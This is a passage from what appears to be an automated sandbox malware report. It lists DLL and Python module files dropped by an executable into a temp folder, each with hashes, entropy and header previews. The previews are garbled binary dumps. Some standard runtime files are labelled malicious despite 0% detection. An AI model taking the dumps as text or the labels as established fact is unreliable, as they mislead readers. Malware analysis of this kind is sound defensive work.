                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..&v.uv.uv.u...ur.u$..tt.u$..t}.u$..t~.u$..tt.u...tt.u.ts.uv.u..u.tw.u.tw.u.iuw.u.tw.uRichv.u................PE..d.....].........." .....@...Z......X2...............................................7....`..........................................u..P...@v..........................H............X..T...........................`X...............P...............................text....?.......@.................. ..`.rdata..p3...P...4...D..............@..@.data...h............x..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\_lzma.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):252488
                                                                                                                                                                                                                                                  Entropy (8bit):6.080982550390949
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:bkHDwqjhhwYbOqQNEkT/4OQhJwAbHoqLNvka/gOFhUw6b4qCNxkV/3OdhAWwPbGE:bd7/IbtSKOt
                                                                                                                                                                                                                                                  MD5:37057C92F50391D0751F2C1D7AD25B02
                                                                                                                                                                                                                                                  SHA1:A43C6835B11621663FA251DA421BE58D143D2AFB
                                                                                                                                                                                                                                                  SHA-256:9442DC46829485670A6AC0C02EF83C54B401F1570D1D5D1D85C19C1587487764
                                                                                                                                                                                                                                                  SHA-512:953DC856AD00C3AEC6AEAB3AFA2DEB24211B5B791C184598A2573B444761DB2D4D770B8B807EBBA00EE18725FF83157EC5FA2E3591A7756EB718EBA282491C7C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0d..^7..^7..^7..7..^7.._6..^7..[6..^7..Z6..^7..]6..^7Q._6..^7.._6..^7.._7..^7Q.S6..^7Q.^6..^7Q..7..^7Q.\6..^7Rich..^7........PE..d.....].........." .................6..............................................o*....`............................................L.......x.......................H.......$...@...T............................................... ............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\_socket.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):78920
                                                                                                                                                                                                                                                  Entropy (8bit):6.061178831576516
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:KzMe79sDb+eGm08Vr5lcDAB9/s+7+pkaOz3CkNA9y1IGVwCyMPbi:de79u8/GFmAB9/se+pROz3jN1IGVw+Pm
                                                                                                                                                                                                                                                  MD5:D6BAE4B430F349AB42553DC738699F0E
                                                                                                                                                                                                                                                  SHA1:7E5EFC958E189C117ECCEF39EC16EBF00E7645A9
                                                                                                                                                                                                                                                  SHA-256:587C4F3092B5F3E34F6B1E927ECC7127B3FE2F7FA84E8A3D0C41828583BD5CEF
                                                                                                                                                                                                                                                  SHA-512:A8F8FED5EA88E8177E291B708E44B763D105907E9F8C9E046C4EEBB8684A1778383D1FBA6A5FA863CA37C42FD58ED977E9BB3A6B12C5B8D9AB6EF44DE75E3D1E
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._....._...^.._...Z..._...[..._...\.._.a.^.._...^.._...^.B._.a.R..._.a._..._.a..._.a.]..._.Rich.._.................PE..d.....].........." .....x..........h........................................`.......2....`.............................................P...0........@.......0..........H....P.........T...........................@................................................text....v.......x.................. ..`.rdata...v.......x...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.035406046605262
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:iWEhWL4+QpBj0HRN7aebXQHRN7LgkSIlexkdT:Qv+qWaM8V6U
                                                                                                                                                                                                                                                  MD5:B56D69079D2001C1B2AF272774B53A64
                                                                                                                                                                                                                                                  SHA1:67EDE1C5A71412B11847F79F5A684EABAF00DE01
                                                                                                                                                                                                                                                  SHA-256:F3A41D882544202B2E1BDF3D955458BE11FC7F76BA12668388A681870636F143
                                                                                                                                                                                                                                                  SHA-512:7EB8FE111DD2E1F7E308B622461EB311C2B9FC4EF44C76E1DEF6C524EB7281D5522AF12211F1F91F651F2B678592D2997FE4CD15724F700DEAFF314A1737B3A8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`...+............ ...................A..............8............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.0443036655888225
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:vWEhW/4+QpBj0HRN7TQHRN7Gp1x09lge9://+qWT8Gps9
                                                                                                                                                                                                                                                  MD5:5AF784F599437629DEEA9FE4E8EB4799
                                                                                                                                                                                                                                                  SHA1:3C891B920FD2703EDD6881117EA035CED5A619F6
                                                                                                                                                                                                                                                  SHA-256:7E5BD3EE263D09C7998E0D5FFA684906DDC56DA61536331C89C74B039DF00C7C
                                                                                                                                                                                                                                                  SHA-512:4DF58513CF52511C0D2037CDC674115D8ED5A0ED4360EB6383CC6A798A7037F3F7F2D587797223ED7797CCD476F1C503B3C16E095843F43E6B87D55AD4822D70
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......ey....`.........................................`................ ...................A..............8............................................................................rdata..$...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.049693596229206
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:UPWEhWcHHV/McJW65FdQpBjSdHnhWgN7a8WckW65FdQHnhWgN7a8WshFoodqnajK:wWEhWmJ7QpBj0HRN7GQHRN7FhSIlexEk
                                                                                                                                                                                                                                                  MD5:E1CA15CF0597C6743B3876AF23A96960
                                                                                                                                                                                                                                                  SHA1:301231F7250431BD122B12ED34A8D4E8BB379457
                                                                                                                                                                                                                                                  SHA-256:990E46D8F7C9574A558EBDFCB8739FBCCBA59D0D3A2193C9C8E66807387A276D
                                                                                                                                                                                                                                                  SHA-512:7C9DACD882A0650BF2F553E9BC5647E6320A66021AC4C1ADC802070FD53DE4C6672A7BACFD397C51009A23B6762E85C8017895E9347A94D489D42C50FA0A1C42
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..0...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.0758779488098416
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:FvfC5WEhWllQpBj0HRN77lQHRN7QSkclsHd/:Fi5uqWB8Q7/
                                                                                                                                                                                                                                                  MD5:8D6599D7C4897DCD0217070CCA074574
                                                                                                                                                                                                                                                  SHA1:25EACAAA4C6F89945E97388796A8C85BA6FB01FB
                                                                                                                                                                                                                                                  SHA-256:A011260FAFAAAEFD7E7326D8D5290C6A76D55E5AF4E43FFA4DE5FEA9B08FA928
                                                                                                                                                                                                                                                  SHA-512:E8E2E7C5BFF41CCAA0F77C3CFEE48DAC43C11E75688F03B719CC1D716DB047597A7A2CE25B561171EF259957BDCD9DD4345A0E0125DB2B36F31698BA178E2248
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):23320
                                                                                                                                                                                                                                                  Entropy (8bit):6.972639549935684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:2BPvVX7WEhWXqEQpBj0HRN7UQHRN7mSIlexb:+PvVXDqHqWU8m6l
                                                                                                                                                                                                                                                  MD5:642B29701907E98E2AA7D36EBA7D78B8
                                                                                                                                                                                                                                                  SHA1:16F46B0E057816F3592F9C0A6671111EA2F35114
                                                                                                                                                                                                                                                  SHA-256:5D72FEAC789562D445D745A55A99536FA9302B0C27B8F493F025BA69BA31941C
                                                                                                                                                                                                                                                  SHA-512:1BEAB2B368CC595BEB39B2F5A2F52D334BC42BF674B8039D334C6D399C966AFF0B15876105F0A4A54FA08E021CB44907ED47D31A0AF9E789EB4102B82025CF57
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.053716052760641
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:9ZWEhWwqEQpBj0HRN7xnE77QHRN7ICMlly:9ZJHqWNE778r
                                                                                                                                                                                                                                                  MD5:F0C73F7454A5CE6FB8E3D795FDB0235D
                                                                                                                                                                                                                                                  SHA1:ACDD6C5A359421D268B28DDF19D3BCB71F36C010
                                                                                                                                                                                                                                                  SHA-256:2A59DD891533A028FAE7A81E690E4C28C9074C2F327393FAB17329AFFE53FD7B
                                                                                                                                                                                                                                                  SHA-512:BD6CF4E37C3E7A1A3B36F42858AF1B476F69CAA4BA1FD836A7E32220E5EFF7CCC811C903019560844AF988A7C77CC41DC6216C0C949D8E04516A537DA5821A3E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0...........`.........................................`...L............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.113839950805383
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:IVxWEhWnqEQpBj0HRN7HQHRN7YAXAXOVlTS:IVh6HqWH8lAH
                                                                                                                                                                                                                                                  MD5:7D4D4593B478B4357446C106B64E61F8
                                                                                                                                                                                                                                                  SHA1:8A4969C9E59D7A7485C8CC5723C037B20DEA5C9D
                                                                                                                                                                                                                                                  SHA-256:0A6E2224CDE90A0D41926E8863F9956848FFBF19848E8855BD08953112AFC801
                                                                                                                                                                                                                                                  SHA-512:7BC9C473705EC98BA0C1DA31C295937D97710CEDEFC660F6A5CB0512BAE36AD23BEBB2F6F14DF7CE7F90EC3F817B02F577317FDD514560AAB22CB0434D8E4E0B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...).NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.052601866399419
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:XWEhW2lQpBj0HRN7NkhXQHRN7vnR1lp1x09lgerA:37qWw8vRnpss
                                                                                                                                                                                                                                                  MD5:7BC1B8712E266DB746914DB48B27EF9C
                                                                                                                                                                                                                                                  SHA1:C76EB162C23865B3F1BD7978F7979D6BA09CCB60
                                                                                                                                                                                                                                                  SHA-256:F82D05AEA21BCF6337EF45FBDAD6D647D17C043A67B44C7234F149F861A012B9
                                                                                                                                                                                                                                                  SHA-512:DB6983F5F9C18908266DBF01EF95EBAE49F88EDC04A0515699EF12201AC9A50F09939B8784C75AE513105ADA5B155E5330BD42D70F8C8C48FE6005513AEFAD2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......r....`.........................................`..._............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.028564065154355
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:nZlrPWEhWcrIAjW65FdQpBjSdHnhWgN7a8WcA+0W65FdQHnhWgN7a8W1P5mzVEMW:ZlzWEhWKFQpBj0HRN7JGQHRN7rCMllq
                                                                                                                                                                                                                                                  MD5:B071E761CEA670D89D7AE80E016CE7E6
                                                                                                                                                                                                                                                  SHA1:C675BE753DBEF1624100F16674C2221A20CF07DD
                                                                                                                                                                                                                                                  SHA-256:63FB84A49308B857804AE1481D2D53B00A88BBD806D257D196DE2BD5C385701E
                                                                                                                                                                                                                                                  SHA-512:F2ECBDABA3516D92BD29DCCE618185F1755451D95C7DBBE23F8215318F6F300A9964C93EC3ED65C5535D87BE82B668E1D3025A7E325AF71A05F14E15D530D35F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.064651561006373
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:DPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8WcnKW65FdQHnhWgN7a8WwFoodqnajqxB:LWEhWFqEQpBj0HRN7XsQHRN7XSIlex7N
                                                                                                                                                                                                                                                  MD5:1DCCF27F2967601CE6666C8611317F03
                                                                                                                                                                                                                                                  SHA1:D8246DF2ED9EC4A8A719FD4B1DB4FD8A71EF679B
                                                                                                                                                                                                                                                  SHA-256:6A83AB9A413AFD74D77A090F52784B0128527BEE9CB0A4224C59D5C75FC18387
                                                                                                                                                                                                                                                  SHA-512:70B96D69D609211F8B9E05FA510EA7D574AE8DA3A6498F5C982AEE71635B8A749162247055B7BA21A884BFA06C1415B68912C463F0F1B6FFB9049F3532386877
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.078698929399523
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:GvuBL3BXWEhWfnhLvQpBj0HRN7YQ3QHRN7Tp1x09lgek/:xBL3B3shLvqWYQ38Tps6
                                                                                                                                                                                                                                                  MD5:569A7AC3F6824A04282FF708C629A6D2
                                                                                                                                                                                                                                                  SHA1:FC0D78DE1075DFD4C1024A72074D09576D4D4181
                                                                                                                                                                                                                                                  SHA-256:84C579A8263A87991CA1D3AEE2845E1C262FB4B849606358062093D08AFDC7A2
                                                                                                                                                                                                                                                  SHA-512:E9CBFF82E32540F9230CEAD9063ACB1ACEB7CCC9F3338C0B7AD10B0AC70FF5B47C15944D0DCE33EA8405554AA9B75DE30B26AE2CA55DB159D45B6E64BC02A180
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......Gg....`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):22296
                                                                                                                                                                                                                                                  Entropy (8bit):7.054401722955359
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:WOMw3zdp3bwjGjue9/0jCRrndbkWEhWE6yQpBj0HRN7LFQHRN7l8pUclXr:WOMwBprwjGjue9/0jCRrndby/qWLF8l4
                                                                                                                                                                                                                                                  MD5:1D75E7B9F68C23A195D408CF02248119
                                                                                                                                                                                                                                                  SHA1:62179FC9A949D238BB221D7C2F71BA7C1680184C
                                                                                                                                                                                                                                                  SHA-256:67EBE168B7019627D68064043680674F9782FDA7E30258748B29412C2B3D4C6B
                                                                                                                                                                                                                                                  SHA-512:C2EE84A9AEAC34F7B51426D12F87BB35D8C3238BB26A6E14F412EA485E5BD3B8FB5B1231323D4B089CF69D8180A38DDD7FD593CC52CBDF250125AD02D66EEA9D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......U.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.0496932942785735
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:/qWEhW8nhLvQpBj0HRN78riQHRN7TaSIlexO:ADhLvqWR8W6s
                                                                                                                                                                                                                                                  MD5:623283471B12F1BDB83E25DBAFAF9C16
                                                                                                                                                                                                                                                  SHA1:ECBBA66F4DCA89A3FAA3E242E30AEFAC8DE02153
                                                                                                                                                                                                                                                  SHA-256:9CA500775FEE9FF69B960D65040B8DC415A2EFDE2982A9251EE6A3E8DE625BC7
                                                                                                                                                                                                                                                  SHA-512:54B69FFA2C263BE4DDADCA62FA2867FEA6148949D64C2634745DB3DCBC1BA0ECF7167F02FA53EFD69EAAEE81D617D914F370F26CA16EE5850853F70C69E9A61F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...l............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.110045595478065
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:nWEhWC5oQpBj0HRN7EODQHRN7nvp1x09lgefv:nNaqWEo8nvpsH
                                                                                                                                                                                                                                                  MD5:61F70F2D1E3F22E976053DF5F3D8ECB7
                                                                                                                                                                                                                                                  SHA1:7D224B7F404CDE960E6B7A1C449B41050C8E9C58
                                                                                                                                                                                                                                                  SHA-256:2695761B010D22FDFDA2B5E73CF0AC7328CCC62B4B28101D5C10155DD9A48020
                                                                                                                                                                                                                                                  SHA-512:1DDC568590E9954DB198F102BE99EABB4133B49E9F3B464F2FC7F31CC77D06D5A7132152F4B331332C42F241562EE6C7BF1C2D68E546DB3F59AB47EAF83A22CF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
